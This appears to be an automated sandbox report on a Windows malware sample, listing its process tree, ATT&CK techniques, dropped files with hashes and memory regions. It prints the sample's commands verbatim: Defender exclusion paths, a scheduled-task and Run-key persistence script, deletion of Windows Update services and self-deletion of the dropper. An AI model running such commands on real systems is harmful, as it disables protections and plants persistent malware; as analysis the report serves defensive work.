PID:1212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uhnchbn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvdrivesllapi64' /tr '''C:\Users\Admin\Locktime\nvdrivesllapi64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Locktime\nvdrivesllapi64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvdrivesllapi64' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvdrivesllapi64" /t REG_SZ /f /d 'C:\Users\Admin\Locktime\nvdrivesllapi64.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn nvdrivesllapi64 /tr 'C:\Users\Admin\Locktime\nvdrivesllapi64.exe'
3⤵
- Creates scheduled task(s)
PID:836

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:1532

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1780

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:844

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:840

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1036

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1504

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1632

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1776

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1568

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1140

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:360

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1704

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe"
2⤵
PID:1212

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#donzwdgx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvdrivesllapi64" } Else { "C:\Users\Admin\Locktime\nvdrivesllapi64.exe" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn nvdrivesllapi64
3⤵
PID:1360

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:1020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:2028

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1656

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1172

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1790524489164381768514574865791545749421-135115265-852223762-12015535341514574729"
1⤵
PID:576

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1412935553-165524735-282810026-1826272192-267381238-901669593-2019901222-272665756"
1⤵
PID:1608

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe
Filesize
9.8MB

MD5
6065cf15064e8d0e6de0c7dc1d46048a

SHA1
c82d4024ec5f5315a7526cb77a13d5f74a12b4b2

SHA256
81df797a79b9139b30d94b3d6f9e982e65b3dd44b7f7e048a69f9c1713d5c392

SHA512
d22d64df214470e26629b4099f3df2cb8a0a4ca1d55bee4f692a4aeb7679c8f39e88e31cc1fe3e3acd349b7efaa8f750d4ae2b84a3718278db136b07264e05ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe
Filesize
9.8MB

MD5
6065cf15064e8d0e6de0c7dc1d46048a

SHA1
c82d4024ec5f5315a7526cb77a13d5f74a12b4b2

SHA256
81df797a79b9139b30d94b3d6f9e982e65b3dd44b7f7e048a69f9c1713d5c392

SHA512
d22d64df214470e26629b4099f3df2cb8a0a4ca1d55bee4f692a4aeb7679c8f39e88e31cc1fe3e3acd349b7efaa8f750d4ae2b84a3718278db136b07264e05ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000009001\avicapn32.exe
Filesize
7.3MB

MD5
ae50461b518a30040f33bab3560683e8

SHA1
b4abdf727194e3b3e4c73f93db2f308969884f2f

SHA256
ee8b0c2ec8680a2fbffe5334b9eeaa2c9aa04edce22c8a30d8052e89fa26950e

SHA512
fc5d4b4e6c93a728e17350dd83d4885bd9fa764002c533c6d13967cae98a6c66ff2742495eca9cf3aadcea312f9baf656f942bf44327817d8da405f4e6f042e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000009001\avicapn32.exe
Filesize
7.3MB

MD5
ae50461b518a30040f33bab3560683e8

SHA1
b4abdf727194e3b3e4c73f93db2f308969884f2f

SHA256
ee8b0c2ec8680a2fbffe5334b9eeaa2c9aa04edce22c8a30d8052e89fa26950e

SHA512
fc5d4b4e6c93a728e17350dd83d4885bd9fa764002c533c6d13967cae98a6c66ff2742495eca9cf3aadcea312f9baf656f942bf44327817d8da405f4e6f042e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe
Filesize
7.2MB

MD5
d121a0468485d70b575e278d407bb76e

SHA1
aa632a96db84885afe0175cfaafbb7317d5fb0ac

SHA256
4f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325

SHA512
59c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f

Download Submit
C:\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe
Filesize
7.2MB

MD5
d121a0468485d70b575e278d407bb76e

SHA1
aa632a96db84885afe0175cfaafbb7317d5fb0ac

SHA256
4f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325

SHA512
59c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
7870d9d4457da468f214ae29915e5acf

SHA1
c21bfa5c728ef38f2924ae78818ed3ce7e8f469a

SHA256
80ecaabe3881bb508182ac930492e165cf89351807ad027d324f9a45218bc64e

SHA512
d43b9f6a9d270d938b5cfa78cc6510e2924409dcbfb54fe4890980fc390358c6d0055c8971a77280d9ffa8a9c1e9a6e7cad6f860bfd9bf7e100d5052075407c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
7870d9d4457da468f214ae29915e5acf

SHA1
c21bfa5c728ef38f2924ae78818ed3ce7e8f469a

SHA256
80ecaabe3881bb508182ac930492e165cf89351807ad027d324f9a45218bc64e

SHA512
d43b9f6a9d270d938b5cfa78cc6510e2924409dcbfb54fe4890980fc390358c6d0055c8971a77280d9ffa8a9c1e9a6e7cad6f860bfd9bf7e100d5052075407c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
7870d9d4457da468f214ae29915e5acf

SHA1
c21bfa5c728ef38f2924ae78818ed3ce7e8f469a

SHA256
80ecaabe3881bb508182ac930492e165cf89351807ad027d324f9a45218bc64e

SHA512
d43b9f6a9d270d938b5cfa78cc6510e2924409dcbfb54fe4890980fc390358c6d0055c8971a77280d9ffa8a9c1e9a6e7cad6f860bfd9bf7e100d5052075407c3

Download Submit
C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll
Filesize
5.0MB

MD5
24ece515d8082af9bbf326e17e9f0670

SHA1
9b7e8e37f2a27ee3c92835873e446686e6f0a723

SHA256
8c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe

SHA512
e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2

Download Submit
C:\Users\Admin\Locktime\nvdrivesllapi64.exe
Filesize
9.8MB

MD5
6065cf15064e8d0e6de0c7dc1d46048a

SHA1
c82d4024ec5f5315a7526cb77a13d5f74a12b4b2

SHA256
81df797a79b9139b30d94b3d6f9e982e65b3dd44b7f7e048a69f9c1713d5c392

SHA512
d22d64df214470e26629b4099f3df2cb8a0a4ca1d55bee4f692a4aeb7679c8f39e88e31cc1fe3e3acd349b7efaa8f750d4ae2b84a3718278db136b07264e05ed

Download Submit
C:\Users\Admin\Locktime\nvdrivesllapi64.exe
Filesize
9.8MB

MD5
6065cf15064e8d0e6de0c7dc1d46048a

SHA1
c82d4024ec5f5315a7526cb77a13d5f74a12b4b2

SHA256
81df797a79b9139b30d94b3d6f9e982e65b3dd44b7f7e048a69f9c1713d5c392

SHA512
d22d64df214470e26629b4099f3df2cb8a0a4ca1d55bee4f692a4aeb7679c8f39e88e31cc1fe3e3acd349b7efaa8f750d4ae2b84a3718278db136b07264e05ed

Download Submit
\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
\Users\Admin\1000003062\syncfiles.dll
Filesize
3.8MB

MD5
f21fc025ebee72fcec06f8b873f28ba3

SHA1
b110a0b82dc5c4895fda4437fbd0f5a1e66fa389

SHA256
9f8120e8454c7788463ef7c0d4ea73c869f88e6210a8da45a76196dfcf837064

SHA512
221cfaf773424d9076af5ce6c17f70ad3bb3125beb0a04fca8be2a8e65df7d1b6ec5c5ea8f3d05c819b9890a51eed9a4fee34e31ac11a2b1dc86df00f09b39fe

Download Submit
\Users\Admin\AppData\Local\Temp\1000008001\Emit64.exe
Filesize
9.8MB

MD5
6065cf15064e8d0e6de0c7dc1d46048a

SHA1
c82d4024ec5f5315a7526cb77a13d5f74a12b4b2

SHA256
81df797a79b9139b30d94b3d6f9e982e65b3dd44b7f7e048a69f9c1713d5c392

SHA512
d22d64df214470e26629b4099f3df2cb8a0a4ca1d55bee4f692a4aeb7679c8f39e88e31cc1fe3e3acd349b7efaa8f750d4ae2b84a3718278db136b07264e05ed

Download Submit
\Users\Admin\AppData\Local\Temp\1000009001\avicapn32.exe
Filesize
7.3MB

MD5
ae50461b518a30040f33bab3560683e8

SHA1
b4abdf727194e3b3e4c73f93db2f308969884f2f

SHA256
ee8b0c2ec8680a2fbffe5334b9eeaa2c9aa04edce22c8a30d8052e89fa26950e

SHA512
fc5d4b4e6c93a728e17350dd83d4885bd9fa764002c533c6d13967cae98a6c66ff2742495eca9cf3aadcea312f9baf656f942bf44327817d8da405f4e6f042e8

Download Submit
\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
\Users\Admin\AppData\Local\Temp\acc0b83959\gntuud.exe
Filesize
5.5MB

MD5
dcded7ac014d98160a90789c615ae3cf

SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da

SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995

SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c

Download Submit
\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe
Filesize
7.2MB

MD5
d121a0468485d70b575e278d407bb76e

SHA1
aa632a96db84885afe0175cfaafbb7317d5fb0ac

SHA256
4f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325

SHA512
59c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f

Download Submit
\Users\Admin\AppData\Roaming\1000006050\umciavi32.exe
Filesize
7.2MB

MD5
d121a0468485d70b575e278d407bb76e

SHA1
aa632a96db84885afe0175cfaafbb7317d5fb0ac

SHA256
4f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325

SHA512
59c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f

Download Submit
\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll
Filesize
5.0MB

MD5
24ece515d8082af9bbf326e17e9f0670

SHA1
9b7e8e37f2a27ee3c92835873e446686e6f0a723

SHA256
8c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe

SHA512
e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2

Download Submit
\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll
Filesize
5.0MB

MD5
24ece515d8082af9bbf326e17e9f0670

SHA1
9b7e8e37f2a27ee3c92835873e446686e6f0a723

SHA256
8c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe

SHA512
e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2

Download Submit
\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll
Filesize
5.0MB

MD5
24ece515d8082af9bbf326e17e9f0670

SHA1
9b7e8e37f2a27ee3c92835873e446686e6f0a723

SHA256
8c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe

SHA512
e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2

Download Submit
\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll
Filesize
5.0MB

MD5
24ece515d8082af9bbf326e17e9f0670

SHA1
9b7e8e37f2a27ee3c92835873e446686e6f0a723

SHA256
8c0ea747424ac83b2392463cdd6d244a62cc3e0557476b5140e035c26e41bcbe

SHA512
e1428917fd7e6643cbc2c561007164edfa7bb8599ffa736d4fdf2bf49b618101eb7a14c79bd250ede9a2a0afa0affe43194a3ace111b4c7c43d29a7e18f9a0e2

Download Submit
\Users\Admin\Locktime\nvdrivesllapi64.exe
Filesize
9.8MB

MD5
6065cf15064e8d0e6de0c7dc1d46048a

SHA1
c82d4024ec5f5315a7526cb77a13d5f74a12b4b2

SHA256
81df797a79b9139b30d94b3d6f9e982e65b3dd44b7f7e048a69f9c1713d5c392

SHA512
d22d64df214470e26629b4099f3df2cb8a0a4ca1d55bee4f692a4aeb7679c8f39e88e31cc1fe3e3acd349b7efaa8f750d4ae2b84a3718278db136b07264e05ed

Download Submit
memory/268-126-0x0000000140000000-0x000000014114B000-memory.dmp

Filesize
17.3MB

Download
memory/268-127-0x0000000140000000-0x000000014114B000-memory.dmp

Filesize
17.3MB

Download
memory/268-152-0x0000000140000000-0x000000014114B000-memory.dmp

Filesize
17.3MB

Download
memory/268-216-0x0000000140000000-0x000000014114B000-memory.dmp

Filesize
17.3MB

Download
memory/268-121-0x0000000000000000-mapping.dmp

Download
memory/316-86-0x0000000000000000-mapping.dmp

Download
memory/360-205-0x0000000000000000-mapping.dmp

Download
memory/368-125-0x0000000000400000-0x0000000000D4E000-memory.dmp

Filesize
9.3MB

Download
memory/368-141-0x0000000000400000-0x0000000000D4E000-memory.dmp

Filesize
9.3MB

Download
memory/368-149-0x0000000000400000-0x0000000000D4E000-memory.dmp

Filesize
9.3MB

Download
memory/368-118-0x0000000000000000-mapping.dmp

Download
memory/420-250-0x0000000000830000-0x0000000000851000-memory.dmp

Filesize
132KB

Download
memory/420-275-0x00000000008E0000-0x0000000000907000-memory.dmp

Filesize
156KB

Download
memory/420-256-0x0000000036CF0000-0x0000000036D00000-memory.dmp

Filesize
64KB

Download
memory/420-255-0x000007FEBD9C0000-0x000007FEBD9D0000-memory.dmp

Filesize
64KB

Download
memory/420-262-0x0000000000830000-0x0000000000851000-memory.dmp

Filesize
132KB

Download
memory/436-65-0x0000000000000000-mapping.dmp

Download
memory/436-68-0x0000000000400000-0x0000000000D4E000-memory.dmp

Filesize
9.3MB

Download
memory/436-73-0x0000000000400000-0x0000000000D4E000-memory.dmp

Filesize
9.3MB

Download
memory/436-79-0x0000000000400000-0x0000000000D4E000-memory.dmp

Filesize
9.3MB

Download
memory/464-264-0x0000000036CF0000-0x0000000036D00000-memory.dmp

Filesize
64KB

Download
memory/464-258-0x000007FEBD9C0000-0x000007FEBD9D0000-memory.dmp

Filesize
64KB

Download
memory/464-276-0x0000000000180000-0x00000000001A7000-memory.dmp

Filesize
156KB

Download
